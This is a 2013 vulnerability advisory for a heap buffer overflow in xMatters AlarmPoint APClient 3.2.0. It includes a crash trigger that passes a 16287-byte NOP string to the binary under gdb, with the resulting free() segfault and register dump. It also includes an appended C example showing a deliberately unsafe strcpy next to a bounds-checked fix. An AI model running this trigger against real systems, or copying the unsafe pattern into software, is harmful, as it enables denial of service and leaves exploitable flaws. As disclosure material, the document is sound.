xMatters Alarmpoint BoF-0day
Source: vfocus.net  Author: Juan Sacco  Published: 2013-02-18
Information
 --------------------

 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High

 Description
 ------------------
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 -------------------
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follows:
 Submit a malicious file containing the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax            0xa303924        170932516
 ecx            0xbfb8   49080
 edx            0xa303924        170932516
 ebx            0x8059438        134583352
 esp            0xbfff3620       0xbfff3620
 ebp            0xbfff3638       0xbfff3638
 esi            0x8059440        134583360
 edi            0x80653f0        134632432
 eip            0x804be8a        0x804be8a <free+126>
 eflags         0x210206 [ PF IF RF ID ]
 cs             0x73     115
 ss             0x7b     123
 ds             0x7b     123
 es             0x7b     123
 fs             0x0      0
 gs             0x33     51
 (gdb)


 Solution
 -------------------
 No patch is available at this time.
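
 The bug class described under Details, as an added illustration in C (not APClient's code, which the advisory does not show): an unbounded copy of a command-line argument into a malloc() buffer, next to a bounded version that rejects an oversized argument such as the 16287-byte one in the gdb session. MSG_CAP and both function names are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the example; the advisory does not give APClient's. */
#define MSG_CAP 4096

/* Unsafe pattern: fixed-size heap buffer, unbounded copy. An argument longer
 * than MSG_CAP-1 bytes writes past the chunk and corrupts allocator metadata,
 * which typically surfaces later as a crash inside free(). */
char *copy_arg_unsafe(const char *arg) {
    char *buf = malloc(MSG_CAP);
    if (buf == NULL) return NULL;
    strcpy(buf, arg);                 /* no length check */
    return buf;
}

/* Hardened pattern: measure with a bound, reject oversized input, then
 * allocate exactly what is needed and copy exactly that many bytes. */
char *copy_arg_checked(const char *arg, size_t cap) {
    if (arg == NULL || cap == 0) return NULL;
    size_t len = 0;
    while (len < cap && arg[len] != '\0') len++;   /* never scans past cap */
    if (len >= cap) return NULL;      /* would not fit together with its NUL */
    char *buf = malloc(len + 1);
    if (buf == NULL) return NULL;
    memcpy(buf, arg, len);
    buf[len] = '\0';
    return buf;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <message>\n", argv[0]);
        return 2;
    }
    char *msg = copy_arg_checked(argv[1], MSG_CAP);
    if (msg == NULL) {
        fprintf(stderr, "argument rejected: longer than %d bytes\n", MSG_CAP - 1);
        return 1;
    }
    printf("accepted %zu bytes\n", strlen(msg));
    free(msg);
    return 0;
}
```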


 